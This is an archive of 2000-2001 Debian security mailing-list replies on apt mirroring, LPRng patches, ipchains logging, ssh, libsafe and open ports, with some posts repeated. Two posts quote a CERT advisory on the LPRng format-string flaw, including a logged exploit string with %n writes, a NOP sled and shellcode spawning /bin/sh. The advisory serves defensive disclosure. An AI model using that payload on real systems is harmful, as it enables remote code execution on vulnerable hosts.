Re: mirroring security.debian.org?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I guess you could make a crontab running 'apt-get update' and 'apt-get -d - -y upgrade', running that in times you have some bandwidth will get all the update, but won't install them. You can now use ftp or something to get the packages to the other machines (or make you /var/cache/apt/archives apt-get-able for you local network). The downside of this approach would be that you won't get any security updates of packages not installed on the machine with the crontab. |---| |Ron Rademaker | |---| |GPG info: | |pub 1024D/DAB68799 2000-10-01 Ron Rademaker [EMAIL PROTECTED] | |Key fingerprint = F3D6 C4DC 6BE3 A37D B29D D93B AC0B B72D DAB6 8799 | | | |Key available from: wwwkeys.nl.pgp.net, wwwkeys.eu.pgp.net or | |wwwkeys.us.pgp.net | |---| |Powered by Debian/GNU Linux 2.2 (potato) (2.2.18 kernel) | |---| On Fri, 26 Jan 2001, Berend De Schouwer wrote: On Fri, 26 Jan 2001 17:10:51 Giacomo Mulas wrote: | On Fri, 26 Jan 2001, Berend De Schouwer wrote: | | I am in a similar situation. I would also like to have a local | mirror, so that the multiple Debian machines do not need to go | over the internet line. Some do not even have internet access, | but would be able to access a local mirror. | | You would probably be better off installing a proxy server (such as | squid) on a computer connected to internet and then configuring apt-get | to use such a proxy. That is done, and it does help to some degree. But the machines that can't access the internet can't go through the proxy server either. That is by design, and will not change. | Bye | Giacomo | | _ | | Giacomo Mulas [EMAIL PROTECTED], [EMAIL PROTECTED] | _ | | OSSERVATORIO ASTRONOMICO | Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA) | | Tel.: +39 070 71180 216 Fax : +39 070 71180 222 | _ | | "When the storms are raging around you, stay right where you are" | (Freddy Mercury) | _ | | | -- | To UNSUBSCRIBE, email to [EMAIL PROTECTED] | with a subject of "unsubscribe". Trouble? Contact | [EMAIL PROTECTED] | Kind regards, Berend -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Berend De Schouwer, +27-11-712-1435, UCS -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6caDvrAu3Ldq2h5kRAuDyAKCkpyXN2eT6qU/XYbPdgMmiuHjydACgv9nN 2RD/cAgPPCu2e0sptPzLZHY= =GT3s -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: mirroring security.debian.org?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I guess you could make a crontab running 'apt-get update' and 'apt-get -d - -y upgrade', running that in times you have some bandwidth will get all the update, but won't install them. You can now use ftp or something to get the packages to the other machines (or make you /var/cache/apt/archives apt-get-able for you local network). The downside of this approach would be that you won't get any security updates of packages not installed on the machine with the crontab. |---| |Ron Rademaker | |---| |GPG info: | |pub 1024D/DAB68799 2000-10-01 Ron Rademaker [EMAIL PROTECTED] | |Key fingerprint = F3D6 C4DC 6BE3 A37D B29D D93B AC0B B72D DAB6 8799 | | | |Key available from: wwwkeys.nl.pgp.net, wwwkeys.eu.pgp.net or | |wwwkeys.us.pgp.net | |---| |Powered by Debian/GNU Linux 2.2 (potato) (2.2.18 kernel) | |---| On Fri, 26 Jan 2001, Berend De Schouwer wrote: On Fri, 26 Jan 2001 17:10:51 Giacomo Mulas wrote: | On Fri, 26 Jan 2001, Berend De Schouwer wrote: | | I am in a similar situation. I would also like to have a local | mirror, so that the multiple Debian machines do not need to go | over the internet line. Some do not even have internet access, | but would be able to access a local mirror. | | You would probably be better off installing a proxy server (such as | squid) on a computer connected to internet and then configuring apt-get | to use such a proxy. That is done, and it does help to some degree. But the machines that can't access the internet can't go through the proxy server either. That is by design, and will not change. | Bye | Giacomo | | _ | | Giacomo Mulas [EMAIL PROTECTED], [EMAIL PROTECTED] | _ | | OSSERVATORIO ASTRONOMICO | Str. 54, Loc. Poggio dei Pini * 09012 Capoterra (CA) | | Tel.: +39 070 71180 216 Fax : +39 070 71180 222 | _ | | When the storms are raging around you, stay right where you are | (Freddy Mercury) | _ | | | -- | To UNSUBSCRIBE, email to [EMAIL PROTECTED] | with a subject of unsubscribe. Trouble? Contact | [EMAIL PROTECTED] | Kind regards, Berend -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Berend De Schouwer, +27-11-712-1435, UCS -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6caDvrAu3Ldq2h5kRAuDyAKCkpyXN2eT6qU/XYbPdgMmiuHjydACgv9nN 2RD/cAgPPCu2e0sptPzLZHY= =GT3s -END PGP SIGNATURE-
Re: lprng
I know there's a debian package of lprng, but I don't know if the patch
you're talking about is applied to this package, I guess you should check
the changelog to find out.
Ron Rademaker
On Wed, 10 Jan 2001, V. Achiaga wrote:
Does anyone know where can I find a debian-specific patch for the
lprng package?
Thanks in advance.
Why? Just read the following...
Subject: CERT Advisory CA-2000-22
-BEGIN PGP SIGNED MESSAGE-
CERT Advisory CA-2000-22 Input Validation Problems in LPRng
Original release date: December 12, 2000
Last updated: --
Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
* Systems running unpatched LPRng software
Overview
A popular replacement software package to the BSD lpd printing service
called LPRng contains at least one software defect, known as a "format
string vulnerability,"[1] which may allow remote users to execute
arbitrary code on vulnerable systems.
I. Description
LPRng, now being packaged in several open-source operating system
distributions, has a missing format string argument in at least two
calls to the syslog() function.
Missing format strings in function calls allow user-supplied arguments
to be passed to a susceptible *snprintf() function call. Remote users
with access to the printer port (port 515/tcp) may be able to pass
format-string parameters that can overwrite arbitrary addresses in the
printing service's address space. Such overwriting can cause
segmentation violations leading to denial of printing services or to
the execution of arbitrary code injected through other means into the
memory segments of the printer service.
Sample syslog entries from successful exploitation of this
vulnerability have been reported, as follows:
Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
This vulnerability has been assigned the identifier CAN-2000-0917 by
the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
The CERT/CC has received reports of extensive probing to port 515/tcp.
In addition, we have received some reports of systems compromised
using this vulnerability. Tools exploiting this vulnerability have
been posted to public forums.
II. Impact
A remote user may be able to execute arbitrary code with elevated
privileges.
In addition, the printing service may be disrupted or disabled
entirely.
III. Solution
Apply a patch from your vendor
Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
the vendor sections below. Alternately, you can obtain the version of
LPRng which fixes the missing format string at:
ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
Disallow access to printer service ports (typically 515/tcp) using firewall
or packet-filtering technologies
Blocking access to the vulnerable service will limit your exposure to
attacks from outside your network perimeter. However, the
vulnerability would still allow local users to gain privileges they
normally shouldn't have; in addition, blocking port 515/tcp at a
network perimeter would still allow any remote user inside the
perimeter to exploit the vulnerability.
Appendix A. Vendor Information
Apple
Apple has conducted an inv
Re: lprng
I know there's a debian package of lprng, but I don't know if the patch
you're talking about is applied to this package, I guess you should check
the changelog to find out.
Ron Rademaker
On Wed, 10 Jan 2001, V. Achiaga wrote:
Does anyone know where can I find a debian-specific patch for the
lprng package?
Thanks in advance.
Why? Just read the following...
Subject: CERT Advisory CA-2000-22
-BEGIN PGP SIGNED MESSAGE-
CERT Advisory CA-2000-22 Input Validation Problems in LPRng
Original release date: December 12, 2000
Last updated: --
Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
* Systems running unpatched LPRng software
Overview
A popular replacement software package to the BSD lpd printing service
called LPRng contains at least one software defect, known as a format
string vulnerability,[1] which may allow remote users to execute
arbitrary code on vulnerable systems.
I. Description
LPRng, now being packaged in several open-source operating system
distributions, has a missing format string argument in at least two
calls to the syslog() function.
Missing format strings in function calls allow user-supplied arguments
to be passed to a susceptible *snprintf() function call. Remote users
with access to the printer port (port 515/tcp) may be able to pass
format-string parameters that can overwrite arbitrary addresses in the
printing service's address space. Such overwriting can cause
segmentation violations leading to denial of printing services or to
the execution of arbitrary code injected through other means into the
memory segments of the printer service.
Sample syslog entries from successful exploitation of this
vulnerability have been reported, as follows:
Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
XX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}
{90}{90}
1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2}{B2}f{89}{D0}1{C9}{89}{CB}C{89}
]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}
E{EE}{F}'{89}M{F0}{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}
M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}
?{89}{D0}{CD}{80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}
E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF}/bin/sh{A}'
This vulnerability has been assigned the identifier CAN-2000-0917 by
the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
The CERT/CC has received reports of extensive probing to port 515/tcp.
In addition, we have received some reports of systems compromised
using this vulnerability. Tools exploiting this vulnerability have
been posted to public forums.
II. Impact
A remote user may be able to execute arbitrary code with elevated
privileges.
In addition, the printing service may be disrupted or disabled
entirely.
III. Solution
Apply a patch from your vendor
Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
the vendor sections below. Alternately, you can obtain the version of
LPRng which fixes the missing format string at:
ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
Disallow access to printer service ports (typically 515/tcp) using firewall
or packet-filtering technologies
Blocking access to the vulnerable service will limit your exposure to
attacks from outside your network perimeter. However, the
vulnerability would still allow local users to gain privileges they
normally shouldn't have; in addition, blocking port 515/tcp at a
network perimeter would still allow any remote user inside the
perimeter to exploit the vulnerability.
Appendix A. Vendor Information
Apple
Apple has conducted an investigation
Re: Speaking of broadcasts, is this a security threat?
Well, you are already telling it to 'shut up' by denying it. If you don't want the denies to show up in your logs, you'll just have to put off the logging option in ipchains. Ron Rademaker On Tue, 8 Aug 2000, Micah Anderson wrote: Every few minutes I see the following show up in my log: Aug 8 00:03:17 riseup kernel: Packet log: input DENY eth0 PROTO=17 +10.0.0.1:1999 255.255.255.255:1999 L=94 S=0x00 I=638 F=0x4000 T=1 (#4) Aug 8 00:49:40 riseup kernel: Packet log: input DENY eth0 PROTO=17 +10.0.0.1:1999 255.255.255.255:1999 L=94 S=0x00 I=639 F=0x4000 T=1 (#4) Aug 8 00:03:17 riseup kernel: Packet log: input DENY eth0 PROTO=17 +10.0.0.1:1999 255.255.255.255:1999 L=94 S=0x00 I=638 F=0x4000 T=1 (#4) Aug 8 00:49:40 riseup kernel: Packet log: input DENY eth0 PROTO=17 +10.0.0.1:1999 255.255.255.255:1999 L=94 S=0x00 I=639 F=0x4000 T=1 (#4) Now if I interpret this correctly this means that my internal network interface is broadcasting protocol 1999 (which is like a kerberos thing? I dont know, I don't have kerberos installed, enabled or anything on my system) - but it seems to be blasting it out and I am trying to deny it. Is this actually something on my end that I need to tell to shutup, or is someone doing this to me? Either one, how can I make it stop?? Thanks! Micah -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Logging atempts
On Mon, 17 Jul 2000, Toth Attila wrote: Some comments on the topic: On Mon, 17 Jul 2000, Florian Friesdorf wrote: On Mon, Jul 17, 2000 at 01:41:46AM +0200, A. Vije wrote: On Sun, 16 Jul 2000, Patrick Barr wrote: What I want to do, is run a programme that will monitor my ppp0 connection for any attempts from anyone to connect to a port and FAIL. I am running 2.4.0 test2 (but I will soon move back to 2.2.16 when potato comes out) and I dont have netfilter on, I just have hosts.deny set to all:all. You can just cat (or tail -f for realtime stats) your syslog (tail -f /var/log/syslog) for as for as i know all attempts get logged there. afaik you need the iplogger package installed, including tcplogd and icmplogd, doing exactly what their names sound like. As far as I know: if you are running a packet filter, and that is the reason why a connection attempt fails, than this event won't reach tcplog, but still appears in syslog (if you filter is configured in this way). for 2.2.x kernels 'ipchains -I input 1 -i ppp0 -l -y -p tcp' will log all incoming tcp connection attempts through ppp0. -- 'man ipchains', for further details If you are using your ppp hard, this rule will produce a lot of logged data. It is more reasonable to set the packet filter to log the tcp connections, which are REJECTed or DENYed by it. This will probably make less logged data. Am I right? Small note Potato ships with 2.2.17pre6. (i`m looking forward to it .. :) Will potato really ship with a pre-kernel? In this case why don't patch-2.4.0-test4? (I know, that this mailing list is not dedicated for questions like this) Not a 2.4.0 because that's a major kernel upgrade, with new functions, where potato is now frozen, so there can't be major upgrades whatsever anymore. Ron Rademaker Happy logging, Dw. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Logging atempts
On Mon, 17 Jul 2000, Toth Attila wrote: Some comments on the topic: On Mon, 17 Jul 2000, Florian Friesdorf wrote: On Mon, Jul 17, 2000 at 01:41:46AM +0200, A. Vije wrote: On Sun, 16 Jul 2000, Patrick Barr wrote: What I want to do, is run a programme that will monitor my ppp0 connection for any attempts from anyone to connect to a port and FAIL. I am running 2.4.0 test2 (but I will soon move back to 2.2.16 when potato comes out) and I dont have netfilter on, I just have hosts.deny set to all:all. You can just cat (or tail -f for realtime stats) your syslog (tail -f /var/log/syslog) for as for as i know all attempts get logged there. afaik you need the iplogger package installed, including tcplogd and icmplogd, doing exactly what their names sound like. As far as I know: if you are running a packet filter, and that is the reason why a connection attempt fails, than this event won't reach tcplog, but still appears in syslog (if you filter is configured in this way). for 2.2.x kernels 'ipchains -I input 1 -i ppp0 -l -y -p tcp' will log all incoming tcp connection attempts through ppp0. -- 'man ipchains', for further details If you are using your ppp hard, this rule will produce a lot of logged data. It is more reasonable to set the packet filter to log the tcp connections, which are REJECTed or DENYed by it. This will probably make less logged data. Am I right? Small note Potato ships with 2.2.17pre6. (i`m looking forward to it .. :) Will potato really ship with a pre-kernel? In this case why don't patch-2.4.0-test4? (I know, that this mailing list is not dedicated for questions like this) Not a 2.4.0 because that's a major kernel upgrade, with new functions, where potato is now frozen, so there can't be major upgrades whatsever anymore. Ron Rademaker Happy logging, Dw. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: using password aging with ssh
Gotten this from the release critical bugreport (last one): Package: ssh (non-US/main) Maintainer: Philip Hands [EMAIL PROTECTED] [HELP] Need fix. (RB) 51747 ssh: can't handle expired passwords 64424 ssh: ssh believes that xauth lives in /usr/openwin/bin [STRATEGY] Needs to be recompiled for powerpc? 66335 ssh: Segfault at fresh install I guess this'll tell you enough... Ron Rademaker On Tue, 4 Jul 2000, thomas lakofski wrote: Hi, Is the above possible? That is, when a user's password has expired, they should be prompted to change it somehow. Works with telnet but that seems to defeat the point entirely. The behaviour as is, is that sshd just gives access denied when the password has aged, even if the second (expiration) period has not yet passed. regards, Thomas , , ,, ., ,. . . .. .. . . ,. who's watching your watchmen? gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=p.nu/d 2B72 53DB 8104 2041 BDB4 F053 4AE5 01DF 81FD 4B43 -- Unsubscribe? mail -s unsubscribe [EMAIL PROTECTED] /dev/null -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Libsafe
On Mon, 19 Jun 2000, Petr Cech wrote:
On Fri, Jun 16, 2000 at 01:30:29PM +0200 , Ron Rademaker wrote:
libc 2.0.x versions are in slink, in potato this is upgraded to 2.1.x
versions, so you won't be able to use libsafe with slink because the libc6
version is to early. The newer libc6 versions won't be uploaded to slink,
libsafe doesn't work with glibc 2.0?
I didn't try..
Ron
you'll have to upgrade to potato (or create a slink system with a lot
potato, but that might cause problems, I never tried) to use libsafe.
but if it does, that you can trry to recompile it on your slink box.
Petr Cech
--
Debian GNU/Linux maintainer - www.debian.{org,cz}
[EMAIL PROTECTED]
Myth the UNIX trademark has changed hands so much no one is quite sure who
really owns it anymore
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Libsafe
I've packages libsafe_1.3-1_i386.deb earlier this week, I don't know if you downloaded that version? If you got it from rademaker.dhs.org, you got that version... As long as you are using an ldso version that is higher then the one it depends on, it shouldn't be a problem, I would advice you to install ld.so.preload-manager, if you want libsafe to be loaded automatically on boot. It is used during installation, but you can also make the library being loaded automatically manually (see docs). I've haven't tried it on slink, only potato and woody, but I guess it'll work as long as the depencies are correct... Ron On Fri, 16 Jun 2000, Richard wrote: Dear All I've been able to find and download libsafe_1.3-1_i386.deb Before I install it does anyone know of any issues with libsafe and Debian 2.1 ?? Will it just install without problems or do I need to alter a few config files ?? Thank you -- Richard Sheffield Linux User's Group http://www.sheflug.co.uk -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Libsafe
libc 2.0.x versions are in slink, in potato this is upgraded to 2.1.x versions, so you won't be able to use libsafe with slink because the libc6 version is to early. The newer libc6 versions won't be uploaded to slink, you'll have to upgrade to potato (or create a slink system with a lot potato, but that might cause problems, I never tried) to use libsafe. Ron On Fri, 16 Jun 2000, Richard wrote: Ron Ron Rademaker wrote: I've packages libsafe_1.3-1_i386.deb earlier this week, I don't know if you downloaded that version? Yes, tried to install it and the --install script came back with... dpkg: dependency problems prevent configuration of libsafe: Libsafe depends on libc6 (=2.12); however: version of libc6 on system is 2.0.7 I've looked round the internet for the updated libc6 and it's not there. Looks like I'll have to wait until it's uploaded to an ftp site. Well, at least you get sensible answers with Debian :-) Thanks -- Richard Sheffield UK http://www.sheflug.co.uk -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Unknown open ports
I've just run a portscan to my computer that is connected to the internet (permanently) and there were a few ports open of which I don't know what they are for (all ports under 1024) and neither did the portscanner, these are the ports: 686 698 708 If I use telnet to go to one of those ports, the connection isn't closed by the remote host (only after I've typed a few things and pressed enter a few times). Anybody got any ideas on what these ports are for? Ron Rademaker
Re: Unknown open ports
Well, all processes do claim to be rpc, why did you think that could not be it (I AM neo.rademaker.dhs.org). Ron PS. Thanks anyway (to all), I'll go closing ports ASAP. On Mon, 5 Jun 2000, Greg Olszewski wrote: On Tue, Jun 06, 2000 at 12:22:33AM +0200, Ron Rademaker wrote: I've just run a portscan to my computer that is connected to the internet (permanently) and there were a few ports open of which I don't know what they are for (all ports under 1024) and neither did the portscanner, these are the ports: 686 698 708 If I use telnet to go to one of those ports, the connection isn't closed by the remote host (only after I've typed a few things and pressed enter a few times). Anybody got any ideas on what these ports are for? Not off the top of my head. The most convienent way I've found to determine is lsof (apt-get install lsof-2.2 or lsof-2.0.36 depending on kernel). Just do a lsof | grep TCP as root and you'll get a list with names pids, and open ports down the right. It's nice. Someone else suggested it was rpc, but if you are actually neo.rademaker.dhs.org (That's what your headers say), that's not it. Oh well. hope this helps greg -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
